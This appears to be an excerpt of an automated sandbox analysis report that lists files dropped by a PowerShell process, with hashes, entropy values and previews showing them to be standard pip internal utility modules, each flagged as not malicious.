                              Preview:"""Generate and work with PEP 425 Compatibility Tags.."""..import re.from typing import List, Optional, Tuple..from pip._vendor.packaging.tags import (. PythonVersion,. Tag,. compatible_tags,. cpython_tags,. generic_tags,. interpreter_name,. interpreter_version,. mac_platforms,.).._osx_arch_pat = re.compile(r"(.+)_(\d+)_(\d+)_(.+)")...def version_info_to_nodot(version_info: Tuple[int, ...]) -> str:. # Only use up to the first two numbers.. return "".join(map(str, version_info[:2]))...def _mac_platforms(arch: str) -> List[str]:. match = _osx_arch_pat.match(arch). if match:. name, major, minor, actual_arch = match.groups(). mac_version = (int(major), int(minor)). arches = [. # Since we have always only checked that the platform starts. # with "macosx", for backwards-compatibility we extract the. # actual prefix provided by the user in case they provided. # something like "macosxcustom_".
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):242
                              Entropy (8bit):4.397332469335865
                              Encrypted:false
                              SSDEEP:6:tj57fw86Cx/McP81xqwXJhA7p8BsjD7QpCJbhy9/oXEcvg:P086CxH8+gW7p8qD0pCJFo/oFY
                              MD5:913AB688B48547F157B5D13B3E854813
                              SHA1:442DC5866A60DAC7CA2578CD773C147E9E1C063A
                              SHA-256:9B6D58DF002D41CFA38BA55E6FA93F33983A034672148E1E81C853767C21FA94
                              SHA-512:F927ACA09E61B6DDB212C234727488AD92E4AC77131BB61AA9D9F4527FBA9877A1819B4DF12D7810DAA882C7BA08D8B3E1D041E6AF689210DE905C2F4AFD20AC
                              Malicious:false
                              Preview:"""For when pip wants to check the date or time.."""..import datetime...def today_is_later_than(year: int, month: int, day: int) -> bool:. today = datetime.date.today(). given = datetime.date(year, month, day).. return today > given.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3627
                              Entropy (8bit):4.513871213115879
                              Encrypted:false
                              SSDEEP:96:zzE7PJcqlskEQsCWMeuOCykDPEuIf2XwB0W:zIjRWnuOl116W
                              MD5:816175BFD9D11C2EE8C609B102953156
                              SHA1:8C790F62DB12BB362628DB33E4992188A1D893DD
                              SHA-256:34AA3C56A2E2A09E279D75C6996E0A75AB3117DD04147919687797D5F4F4F02F
                              SHA-512:754C7FB0D46AF13CCA0C05663A2DB9775C8C0A16BE6D8D166F4FA2FA494985A33D22B267D32AC1D267A049CDAE1B3FAF25CBA924641A2B167406EB0A196CAE06
                              Malicious:false
                              Preview:""".A module that implements tooling to enable easy warnings about deprecations.."""..import logging.import warnings.from typing import Any, Optional, TextIO, Type, Union..from pip._vendor.packaging.version import parse..from pip import __version__ as current_version # NOTE: tests patch this name...DEPRECATION_MSG_PREFIX = "DEPRECATION: "...class PipDeprecationWarning(Warning):. pass..._original_showwarning: Any = None...# Warnings <-> Logging Integration.def _showwarning(. message: Union[Warning, str],. category: Type[Warning],. filename: str,. lineno: int,. file: Optional[TextIO] = None,. line: Optional[str] = None,.) -> None:. if file is not None:. if _original_showwarning is not None:. _original_showwarning(message, category, filename, lineno, file, line). elif issubclass(category, PipDeprecationWarning):. # We use a specially named logger which will handle all of the. # deprecation messages for pip.. logger = loggi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3206
                              Entropy (8bit):4.41721615869807
                              Encrypted:false
                              SSDEEP:48:jpU715//QnXpoT2/vGwQhFDd5K6gte3baYiOXaoS31oMYS96KDJGY/7T:jpdme6xLiOgFoMF9R4Y/7T
                              MD5:3D5E258E0C3E2552C1BA4254BA2CC40B
                              SHA1:DD92E884DF95195217318DB385B1DBD399D50D0C
                              SHA-256:E85D6D736ADC29A0999A07D5C2C13A39B21EFCFBB1DB799455803ED83F700857
                              SHA-512:6D2B54978F0915BB3F8509E29A58624AF1C20BDB288752D5845AB714DDE64C5D06DA0F98FAB93715D2C49C75150E73C88C15AE656480C03356D300206ED35FE6
                              Malicious:false
                              Preview:from typing import Optional..from pip._internal.models.direct_url import ArchiveInfo, DirectUrl, DirInfo, VcsInfo.from pip._internal.models.link import Link.from pip._internal.utils.urls import path_to_url.from pip._internal.vcs import vcs...def direct_url_as_pep440_direct_reference(direct_url: DirectUrl, name: str) -> str:. """Convert a DirectUrl to a pip requirement string.""". direct_url.validate() # if invalid, this is a pip bug. requirement = name + " @ ". fragments = []. if isinstance(direct_url.info, VcsInfo):. requirement += "{}+{}@{}".format(. direct_url.info.vcs, direct_url.url, direct_url.info.commit_id. ). elif isinstance(direct_url.info, ArchiveInfo):. requirement += direct_url.url. if direct_url.info.hash:. fragments.append(direct_url.info.hash). else:. assert isinstance(direct_url.info, DirInfo). requirement += direct_url.url. if direct_url.subdirectory:. fragments.append("sub
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):2463
                              Entropy (8bit):4.582459566567463
                              Encrypted:false
                              SSDEEP:48:da7JM7wQ1OP1d7wrNSd3O01iXD563sI4dMfqtpCY2MmaLKo9LXIx5u:dl7DONtw+3O8kD568I4dFS+m2XIx5u
                              MD5:779E46DB7BBC718A77B123CF76078CE1
                              SHA1:7F16CAC0927CDF0A044E03F617A9E94A427B859E
                              SHA-256:D0578F6685182AFE11190DADEB1EF0E59E36EF06C0FD4A375999C092B82CBAAA
                              SHA-512:A2B7F6CBD31DFA7DF5C014E14BFB7FDB33EE41363E7E4531842C3B6F14DACF60DEECFB4F57346AE2072A48F7A1AFEC88DCFDC6DB1B0BA326E4FEB58F329E9FEA
                              Malicious:false
                              Preview:import os.import re.import sys.from typing import List, Optional..from pip._internal.locations import site_packages, user_site.from pip._internal.utils.virtualenv import (. running_under_virtualenv,. virtualenv_no_global,.)..__all__ = [. "egg_link_path_from_sys_path",. "egg_link_path_from_location",.]...def _egg_link_names(raw_name: str) -> List[str]:. """. Convert a Name metadata value to a .egg-link name, by applying. the same substitution as pkg_resources's safe_name function.. Note: we cannot use canonicalize_name because it has a different logic... We also look for the raw name (without normalization) as setuptools 69 changed. the way it names .egg-link files (https://github.com/pypa/setuptools/issues/4167).. """. return [. re.sub("[^A-Za-z0-9.]+", "-", raw_name) + ".egg-link",. f"{raw_name}.egg-link",. ]...def egg_link_path_from_sys_path(raw_name: str) -> Optional[str]:. """. Look for a .egg-link file for project name, by
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1169
                              Entropy (8bit):5.000664368044061
                              Encrypted:false
                              SSDEEP:24:9dJ6f/5kaXMOvjjmuZF5wSy/WGLiT/RpqwaphPaw/baVY9g4e8+Kv:Hg/5jcOvjjmuN8ejNUjiw/2h47
                              MD5:71781AF636DF2088D9C6FA15B8248724
                              SHA1:31C2038B64DD5D3DD3C4CF560E354E4471B144A0
                              SHA-256:AAAB170ED8B03088D730488855268E8F01F96268AB09A2BE748CDBEBE5C9B0BD
                              SHA-512:A6D65005137278C217BDAE67FC2A971B22066DD5D8B307A96C0B40550BAD32E11870DC89411969290D2C3BAABDE8650CE34DC4CE58A0C22438DAB36733A53155
                              Malicious:false
                              Preview:import codecs.import locale.import re.import sys.from typing import List, Tuple..BOMS: List[Tuple[bytes, str]] = [. (codecs.BOM_UTF8, "utf-8"),. (codecs.BOM_UTF16, "utf-16"),. (codecs.BOM_UTF16_BE, "utf-16-be"),. (codecs.BOM_UTF16_LE, "utf-16-le"),. (codecs.BOM_UTF32, "utf-32"),. (codecs.BOM_UTF32_BE, "utf-32-be"),. (codecs.BOM_UTF32_LE, "utf-32-le"),.]..ENCODING_RE = re.compile(rb"coding[:=]\s*([-\w.]+)")...def auto_decode(data: bytes) -> str:. """Check a bytes string for a BOM to correctly detect the encoding.. Fallback to locale.getpreferredencoding(False) like open() on Python3""". for bom, encoding in BOMS:. if data.startswith(bom):. return data[len(bom) :].decode(encoding). # Lets check the first two lines as in PEP263. for line in data.split(b"\n")[:2]:. if line[0:1] == b"#" and ENCODING_RE.search(line):. result = ENCODING_RE.search(line). assert result is not None. encoding = result.gr
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3064
                              Entropy (8bit):4.680639595700007
                              Encrypted:false
                              SSDEEP:48:TvlkosG2/35jkXM50XK1gFIsSBbn1fUcZya9EvZOWwam3rKZSKtZ9dPr9S9ybIA:TvlkosTKXM5GDFIzZ1fJya9EvZOWwa3h
                              MD5:6824909158AACEE9DF77A01C1783AF2E
                              SHA1:DF1011DF89A89E8E184B38CF4232CC1B15446CC0
                              SHA-256:62584B4D1976A07040BAA85CFB398BED4492EBB4CF5951C89A3780407ADE6534
                              SHA-512:6BA7233C1F1EF34F5BF4FCF4FD0A420CADBDCB8A75C32EDC83AAE81C36E7503C569E786F61E03B55B57C6AEE70ED041B7E9FB1D889E18FCD2085AF09A1A727EF
                              Malicious:false
                              Preview:import itertools.import os.import shutil.import sys.from typing import List, Optional..from pip._internal.cli.main import main.from pip._internal.utils.compat import WINDOWS.._EXECUTABLE_NAMES = [. "pip",. f"pip{sys.version_info.major}",. f"pip{sys.version_info.major}.{sys.version_info.minor}",.].if WINDOWS:. _allowed_extensions = {"", ".exe"}. _EXECUTABLE_NAMES = [. "".join(parts). for parts in itertools.product(_EXECUTABLE_NAMES, _allowed_extensions). ]...def _wrapper(args: Optional[List[str]] = None) -> int:. """Central wrapper for all old entrypoints... Historically pip has had several entrypoints defined. Because of issues. arising from PATH, sys.path, multiple Pythons, their interactions, and most. of them having a pip installed, users suffer every time an entrypoint gets. moved... To alleviate this pain, and provide a mechanism for warning users and. directing them to an appropriate place for help, we now define all of. our
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script text executable Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5122
                              Entropy (8bit):4.553153847418192
                              Encrypted:false
                              SSDEEP:96:zVW6uMIojkzH5WrQXbsB4RTN8D+aQuaOAL7hELnDGVv:zVuMTkzZW0XAB4RTN8DcJOAXSL6Vv
                              MD5:DEEE0A94B232580C4DAC9C3741A00528
                              SHA1:7E4452EE2A28E0E3E10D02D1BA115870E9540E4F
                              SHA-256:4613085D468D54C1A3737AE1B036A1590E0C6AFBC440376A5EA82AF85E9FA70F
                              SHA-512:A55B030CD406095F34A7772C448901141CD95EC0E9FD04DDB0F42D7DE950BF32DB091353A407EC7E844DDFDFAA25730BBD21D3A7B7AB56D3981AF6E71159BFA3
                              Malicious:false
                              Preview:import fnmatch.import os.import os.path.import random.import sys.from contextlib import contextmanager.from tempfile import NamedTemporaryFile.from typing import Any, BinaryIO, Generator, List, Union, cast..from pip._vendor.tenacity import retry, stop_after_delay, wait_fixed..from pip._internal.utils.compat import get_path_uid.from pip._internal.utils.misc import format_size...def check_path_owner(path: str) -> bool:. # If we don't have a way to check the effective uid of this process, then. # we'll just assume that we own the directory.. if sys.platform == "win32" or not hasattr(os, "geteuid"):. return True.. assert os.path.isabs(path).. previous = None. while path != previous:. if os.path.lexists(path):. # Check if path is writable by current user.. if os.geteuid() == 0:. # Special handling for root user in order to handle properly. # cases where users use sudo without -H flag.. try:.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):716
                              Entropy (8bit):5.128064341013586
                              Encrypted:false
                              SSDEEP:12:cELEYBRrGB2BLZYnBLZ3CLaBLZXWYaBLZYKsBnJTeeG8WbJVw57eMF5YooXHv:cFYq2BmnBU2BBWYaBmT7yeG8WbJOF5ni
                              MD5:DAAE55F86E9BAE3D0AFFC1181F6ACD85
                              SHA1:B75E13EF5D44699F0AF4AE12882321E63045B936
                              SHA-256:8BC5C04347850A8836E85C3DC95D186F5CA002A298075C3D0B3F67D1F8FC8195
                              SHA-512:AFEDC5779F8E90FCF5840FFE49E7916971AA461B6056FB434078018518AFFFE834C9BD6A9DCE10D886361B1340807E09B7CD47F8D51C9FA8183C3EB759B59ABC
                              Malicious:false
                              Preview:"""Filetype information.."""..from typing import Tuple..from pip._internal.utils.misc import splitext..WHEEL_EXTENSION = ".whl".BZ2_EXTENSIONS: Tuple[str, ...] = (".tar.bz2", ".tbz").XZ_EXTENSIONS: Tuple[str, ...] = (. ".tar.xz",. ".txz",. ".tlz",. ".tar.lz",. ".tar.lzma",.).ZIP_EXTENSIONS: Tuple[str, ...] = (".zip", WHEEL_EXTENSION).TAR_EXTENSIONS: Tuple[str, ...] = (".tar.gz", ".tgz", ".tar").ARCHIVE_EXTENSIONS = ZIP_EXTENSIONS + BZ2_EXTENSIONS + TAR_EXTENSIONS + XZ_EXTENSIONS...def is_archive_file(name: str) -> bool:. """Return True if `name` is a considered as an archive file.""". ext = splitext(name)[1].lower(). if ext in ARCHIVE_EXTENSIONS:. return True. return False.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3113
                              Entropy (8bit):4.827361926561468
                              Encrypted:false
                              SSDEEP:48:ZMNMpeTLWUrUbFOt6eI0J3PeIOwea072T5ECUtGL7xMcIko/VKY:ZMNZTLWUr+wR1LOZ72TweKzF/VKY
                              MD5:A806CD4E60BF0FECAF532A9B5B31EB5B
                              SHA1:993BE097901608F3160F7E3FAFECCD7D1D21CA27
                              SHA-256:31EB31C6083704BC6178B671F9D49FDF46FA80AA4E81D557C3A5BEFAE1D2B334
                              SHA-512:8C182D639D0E8FA33357CFEE3368372D06EC0EAA393E61E77697F81D67D811A978FD4F90C220B10BF41BFA3D4BA4A132DCE55B9392E7B93E0A5185652D934C8C
                              Malicious:false
                              Preview:import os.import sys.from typing import Optional, Tuple...def glibc_version_string() -> Optional[str]:. "Returns glibc version string, or None if not using glibc.". return glibc_version_string_confstr() or glibc_version_string_ctypes()...def glibc_version_string_confstr() -> Optional[str]:. "Primary implementation of glibc_version_string using os.confstr.". # os.confstr is quite a bit faster than ctypes.DLL. It's also less likely. # to be broken or missing. This strategy is used in the standard library. # platform module:. # https://github.com/python/cpython/blob/fcf1d003bf4f0100c9d0921ff3d70e1127ca1b71/Lib/platform.py#L175-L183. if sys.platform == "win32":. return None. try:. gnu_libc_version = os.confstr("CS_GNU_LIBC_VERSION"). if gnu_libc_version is None:. return None. # os.confstr("CS_GNU_LIBC_VERSION") returns a string like "glibc 2.17":. _, version = gnu_libc_version.split(). except (AttributeError, OSErr
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5118
                              Entropy (8bit):4.517865882857644
                              Encrypted:false
                              SSDEEP:96:fvrEB0PsuMoLSGXoTV+HmGX8s6yIibhrHLNdbf8+EH0Kj:7ELbG4TV+HmO8smi1rHJ9fMHfj
                              MD5:EA92F1296B5F78FF606AB11DD214F312
                              SHA1:F88BDEA46699ABB220C1F5720B4652629CB16B28
                              SHA-256:3233A2802EF9CFAAA844C9201E21EAA2DEDEAB17F00D94AB11F94930F9BE6C71
                              SHA-512:D1707C0A8775A1C7621C81E7ACBCF308E01F4684B3AB45350E777F39FB0B5B0F64ADC78DD181F4DFF3B36F4D41906FACCCE10DAD3A7F3E430D1559004ECC4DCA
                              Malicious:false
                              Preview:import hashlib.from typing import TYPE_CHECKING, BinaryIO, Dict, Iterable, List, Optional..from pip._internal.exceptions import HashMismatch, HashMissing, InstallationError.from pip._internal.utils.misc import read_chunks..if TYPE_CHECKING:. from hashlib import _Hash.. # NoReturn introduced in 3.6.2; imported only for type checking to maintain. # pip compatibility with older patch versions of Python 3.6. from typing import NoReturn...# The recommended hash algo of the moment. Change this whenever the state of.# the art changes; it won't hurt backward compatibility..FAVORITE_HASH = "sha256"...# Names of hashlib algorithms allowed by the --hash option and ``pip hash``.# Currently, those are the ones at least as collision-resistant as sha256..STRONG_HASHES = ["sha256", "sha384", "sha512"]...class Hashes:. """A wrapper that builds multiple hashes at once and checks them against. known-good values.. """.. def __init__(self, hashes: Optional[Dict[str, List[str]]] = No
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):11603
                              Entropy (8bit):4.446627443976613
                              Encrypted:false
                              SSDEEP:192:qiZ5NF0lNQR6DWUDZr2Huat0L1Si2hx5pVADOrliz19UIMAcEzZnz+:qiZ5NePQR6XZKKLQDpVaAgzZMAbzZC
                              MD5:0AD835A23492444085B4AED4A530E370
                              SHA1:6CFC66CC5325E5E0D1DE8C31202EB486D71EBC0F
                              SHA-256:7DDB6E649F802A4AB00D300D0EF19C044A6CB0BF1E97B4F58E7C24D429D99776
                              SHA-512:C472B6D25C98EAA39C49ACE5F37A624988BA999D2379077945F9D8974A207AF04BD136018FF7FA34D56DDA95907269DD18D7157850CF7CC5D91E52889567F464
                              Malicious:false
                              Preview:import contextlib.import errno.import logging.import logging.handlers.import os.import sys.import threading.from dataclasses import dataclass.from io import TextIOWrapper.from logging import Filter.from typing import Any, ClassVar, Generator, List, Optional, TextIO, Type..from pip._vendor.rich.console import (. Console,. ConsoleOptions,. ConsoleRenderable,. RenderableType,. RenderResult,. RichCast,.).from pip._vendor.rich.highlighter import NullHighlighter.from pip._vendor.rich.logging import RichHandler.from pip._vendor.rich.segment import Segment.from pip._vendor.rich.style import Style..from pip._internal.utils._log import VERBOSE, getLogger.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.deprecation import DEPRECATION_MSG_PREFIX.from pip._internal.utils.misc import ensure_dir.._log_state = threading.local().subprocess_logger = getLogger("pip.subprocessor")...class BrokenStdoutLoggingError(Exception):. """. Raised if BrokenPipeError oc
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):23623
                              Entropy (8bit):4.7563719569294
                              Encrypted:false
                              SSDEEP:384:6dRrq8/RVgKgUkgpDvxLUcK/Mi3R2AlEvPOu/O0CYkjQE0RAEqibCGMbuVWP3/vN:6dRrq85tFLWb/vB2UUOzUQQEibCNCUP9
                              MD5:E6A83F5B8D0DD3744860E95B00F165E1
                              SHA1:872DF28D996A12A42EE287A09E0C88386C6C4FE4
                              SHA-256:7CD5F069E7A292F9D4B7808F30520BE3E2106D90F1C638F88C3A730A2E19B0EC
                              SHA-512:3F91620184643000F8278F4D2965F4D022324FC133933336C7860A835DEF9072CA0D659EC095834FABBEE11163F8BE98D8D79519CE2F448A022327091053B084
                              Malicious:false
                              Preview:import contextlib.import errno.import getpass.import hashlib.import io.import logging.import os.import posixpath.import shutil.import stat.import sys.import sysconfig.import urllib.parse.from functools import partial.from io import StringIO.from itertools import filterfalse, tee, zip_longest.from pathlib import Path.from types import FunctionType, TracebackType.from typing import (. Any,. BinaryIO,. Callable,. ContextManager,. Dict,. Generator,. Iterable,. Iterator,. List,. Optional,. TextIO,. Tuple,. Type,. TypeVar,. Union,. cast,.)..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.pyproject_hooks import BuildBackendHookCaller.from pip._vendor.tenacity import retry, stop_after_delay, wait_fixed..from pip import __version__.from pip._internal.exceptions import CommandError, ExternallyManagedEnvironment.from pip._internal.locations import get_major_minor_version.from pip._internal.utils.compat import WINDOWS.from
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1193
                              Entropy (8bit):4.604961326505357
                              Encrypted:false
                              SSDEEP:24:GYV8VwJAxxFcyTQeQbnmSjmjg/yCXryJIIv:D2wJocOWpjmsqCXrEII
                              MD5:2CEC238042EBD1D49C71C8901BBCB028
                              SHA1:3DD814E8C7938BFDBBBFEA5EFB457EB59FCD0F2D
                              SHA-256:E46A18539F3A4ABC5444CBC39FF8C13092278ADBE2260E0EE7E88E53EE88D166
                              SHA-512:8A85DAAE5682CEA6BFECE76F9249CA9C93165174D02143FF8C36EC911E651820F852A0CE3E00F8EA06DFFD95B4DCF43178A9B49D0030A3D3F1F26ABEBFDEF342
                              Malicious:false
                              Preview:"""Utilities for defining models."""..import operator.from typing import Any, Callable, Type...class KeyBasedCompareMixin:. """Provides comparison capabilities that is based on a key""".. __slots__ = ["_compare_key", "_defining_class"].. def __init__(self, key: Any, defining_class: Type["KeyBasedCompareMixin"]) -> None:. self._compare_key = key. self._defining_class = defining_class.. def __hash__(self) -> int:. return hash(self._compare_key).. def __lt__(self, other: Any) -> bool:. return self._compare(other, operator.__lt__).. def __le__(self, other: Any) -> bool:. return self._compare(other, operator.__le__).. def __gt__(self, other: Any) -> bool:. return self._compare(other, operator.__gt__).. def __ge__(self, other: Any) -> bool:. return self._compare(other, operator.__ge__).. def __eq__(self, other: Any) -> bool:. return self._compare(other, operator.__eq__).. def _compare(self, other: Any, meth
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):2108
                              Entropy (8bit):4.7637552285305045
                              Encrypted:false
                              SSDEEP:48:jncRgRE2HwcqDvLSwcqzpHhTR4kLmVTt4zSecRgE+MK8Uz37Xu:jcRgRVHwceOwc2pBTvaVTtgkST8UDK
                              MD5:44BE67AD6261ED654E8AD10A7FFDAA1F
                              SHA1:F9673A16D2FE6A03E450EE1E0D2C8C67EA812B87
                              SHA-256:E569BAFF1EE52AB96A5633C8E4C04DFD1BAB7111F0558A10ECAB2BB3CE1D7BBB
                              SHA-512:59FC39A6006AE2208A171D39D441E9A17ABA04EB0DCC7FA53BA9A5922E7ED95F5A2DCA504691D282C4D470878A313A69592AB0F8BA63D2EE53A27E959B8CC4C3
                              Malicious:false
                              Preview:import functools.import logging.import re.from typing import NewType, Optional, Tuple, cast..from pip._vendor.packaging import specifiers, version.from pip._vendor.packaging.requirements import Requirement..NormalizedExtra = NewType("NormalizedExtra", str)..logger = logging.getLogger(__name__)...def check_requires_python(. requires_python: Optional[str], version_info: Tuple[int, ...].) -> bool:. """. Check if the given Python version matches a "Requires-Python" specifier... :param version_info: A 3-tuple of ints representing a Python. major-minor-micro version to check (e.g. `sys.version_info[:3]`)... :return: `True` if the given Python version satisfies the requirement.. Otherwise, return `False`... :raises InvalidSpecifier: If `requires_python` has an invalid format.. """. if requires_python is None:. # The package provides no information. return True. requires_python_specifier = specifiers.SpecifierSet(requires_python).. pyth
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4435
                              Entropy (8bit):4.699482613201015
                              Encrypted:false
                              SSDEEP:96:kbgreKp42fODz3khb1T8B94gMGlbJNaX8F0K34VTdtBN:kbghp4zDz0vinllLaz1djN
                              MD5:9AE597EF5E68B8DD221A74A47327B0E6
                              SHA1:B3BCCB4896004FF798DA12A3D87978F7B62EFC45
                              SHA-256:A2E5E9B9DFA3792F313F24CFB1727E9B7E0D3EF2B9A2CE39A2D03375257F2091
                              SHA-512:DB55ECACE9AEA1C8EFCE7D30664FD66A17C7D1A3735E4AAAEFDE39048BE75D0268542E925C5B30DEBBEB6063F6A465289B4C786EC3753A1BB4E424AA75017006
                              Malicious:false
                              Preview:import sys.import textwrap.from typing import List, Optional, Sequence..# Shim to wrap setup.py invocation with setuptools.# Note that __file__ is handled via two {!r} *and* %r, to ensure that paths on.# Windows are correctly handled (it should be "C:\\Users" not "C:\Users").._SETUPTOOLS_SHIM = textwrap.dedent(. """. exec(compile('''. # This is <pip-setuptools-caller> -- a caller that pip uses to run setup.py. #. # - It imports setuptools before invoking setup.py, to enable projects that directly. # import from `distutils.core` to work with newer packaging standards.. # - It provides a clear error message when setuptools is not installed.. # - It sets `sys.argv[0]` to the underlying `setup.py`, when invoking `setup.py` so. # setuptools doesn't think the script is `-c`. This avoids the following warning:. # manifest_maker: standard file '-c' not found".. # - It generates a shim setup.py, for handling setup.cfg-only projects.. import os, sys, t
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):9207
                              Entropy (8bit):4.453211429819829
                              Encrypted:false
                              SSDEEP:192:TbMPTT/+tsJHXvM2rJicKl5zLeuBTyTt+WW+JC:TbMPTqcMfFBTyTtQ
                              MD5:17BD4BC40EECB1E99A4F82FBF350CE85
                              SHA1:2A5EF413060467B26635CECB25418BA5F1308B11
                              SHA-256:CF376299BEF98D52C4D465385A54D9D39E60733843EE7D72D714DC35CEEF3594
                              SHA-512:CD027A1AA823B476B55C39AC5DAF49922DA74283658FE4ADA47E66E57793F77216DB8EA7914296B74835EDE1A4A126FCE83598356400BD854C7808C4CCFEC3ED
                              Malicious:false
                              Preview:import logging.import os.import shlex.import subprocess.from typing import (. TYPE_CHECKING,. Any,. Callable,. Iterable,. List,. Mapping,. Optional,. Union,.)..from pip._vendor.rich.markup import escape..from pip._internal.cli.spinners import SpinnerInterface, open_spinner.from pip._internal.exceptions import InstallationSubprocessError.from pip._internal.utils.logging import VERBOSE, subprocess_logger.from pip._internal.utils.misc import HiddenText..if TYPE_CHECKING:. # Literal was introduced in Python 3.8.. #. # TODO: Remove `if TYPE_CHECKING` when dropping support for Python 3.7.. from typing import Literal..CommandArgs = List[Union[str, HiddenText]]...def make_command(*args: Union[str, HiddenText, CommandArgs]) -> CommandArgs:. """. Create a CommandArgs object.. """. command_args: CommandArgs = []. for arg in args:. # Check for list instead of CommandArgs since CommandArgs is. # only known during type-checking..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):9312
                              Entropy (8bit):4.365866948736783
                              Encrypted:false
                              SSDEEP:96:rLimqx5ejyJSWl6pU/0VJB6cDtbKRp8dCLks+ajs8yCLDU0HkJqltwaV4Ypkq3l4:6m+sjyJN62Abty88gtinltU
                              MD5:913F777212E4D08649A817F723CDB63F
                              SHA1:0318C8A2E74430EEC9CD32CC2A5C762493014187
                              SHA-256:0D4030DB6B85AEE41D2B8DE2D8BD8AE770BE0838D108F780B01289A6EFAB1D0E
                              SHA-512:73CEB507E3863AD1355498DA0F677571EBF775FC1017183803B783FA745FC0B78889212C0ACB027950CE40B0E25CEB8BCF63A3458F281249430F70673C498648
                              Malicious:false
                              Preview:import errno.import itertools.import logging.import os.path.import tempfile.import traceback.from contextlib import ExitStack, contextmanager.from pathlib import Path.from typing import (. Any,. Callable,. Dict,. Generator,. List,. Optional,. TypeVar,. Union,.)..from pip._internal.utils.misc import enum, rmtree..logger = logging.getLogger(__name__).._T = TypeVar("_T", bound="TempDirectory")...# Kinds of temporary directories. Only needed for ones that are.# globally-managed..tempdir_kinds = enum(. BUILD_ENV="build-env",. EPHEM_WHEEL_CACHE="ephem-wheel-cache",. REQ_BUILD="req-build",.)..._tempdir_manager: Optional[ExitStack] = None...@contextmanager.def global_tempdir_manager() -> Generator[None, None, None]:. global _tempdir_manager. with ExitStack() as stack:. old_tempdir_manager, _tempdir_manager = _tempdir_manager, stack. try:. yield. finally:. _tempdir_manager = old_tempdir_manager...class TempDirecto
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):8821
                              Entropy (8bit):4.428223920452587
                              Encrypted:false
                              SSDEEP:96:yFfRQWGbY5i3q0En361k7xHWOvhUg4trsHMh2UWcvdtjck8NxtBxtRe1ZXM8hyc:o7P5Gq0E368ZvuthzvZ8NxtBxtReAQ
                              MD5:1F709C05BB91A3BF657BEC730B3FF8D5
                              SHA1:9761F6164167AF6B9EF5F4BDB68299B6C48DB277
                              SHA-256:4816F6895D5CADBF3D30345310A63CE91E00FD43960294D09FD55055C3033A51
                              SHA-512:3CD2CD55E747F9A96A9F967367530DD10A0887A778BDA8DACADA5D204943BE59E92E21ED62A58DF23592A0F02544CE6C59B6F06EC2CB835E1EBCB14AE8338FB6
                              Malicious:false
                              Preview:"""Utilities related archives.."""..import logging.import os.import shutil.import stat.import tarfile.import zipfile.from typing import Iterable, List, Optional.from zipfile import ZipInfo..from pip._internal.exceptions import InstallationError.from pip._internal.utils.filetypes import (. BZ2_EXTENSIONS,. TAR_EXTENSIONS,. XZ_EXTENSIONS,. ZIP_EXTENSIONS,.).from pip._internal.utils.misc import ensure_dir..logger = logging.getLogger(__name__)...SUPPORTED_EXTENSIONS = ZIP_EXTENSIONS + TAR_EXTENSIONS..try:. import bz2 # noqa.. SUPPORTED_EXTENSIONS += BZ2_EXTENSIONS.except ImportError:. logger.debug("bz2 module is not available")..try:. # Only for Python 3.3+. import lzma # noqa.. SUPPORTED_EXTENSIONS += XZ_EXTENSIONS.except ImportError:. logger.debug("lzma module is not available")...def current_umask() -> int:. """Get the current umask which involves having to set it temporarily.""". mask = os.umask(0). os.umask(mask). return mask...def split_
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1759
                              Entropy (8bit):4.587172040585541
                              Encrypted:false
                              SSDEEP:48:BHphSbWppG7XgI/LwN8C8Q0U9XUOsunuf90ZQ1XZ6feSv:rfpOgcLspYOsMuV0ZQ9OXv
                              MD5:918837F1E3B41DCD1CE4B7A334BDF84F
                              SHA1:FFB06FCE78F5DA3DFA1BF3F8B428DDA882893684
                              SHA-256:02169EB141A5FBD8ADEAEBC6E9FB053CEAFDCA716919A4CC938B795D35FB67F4
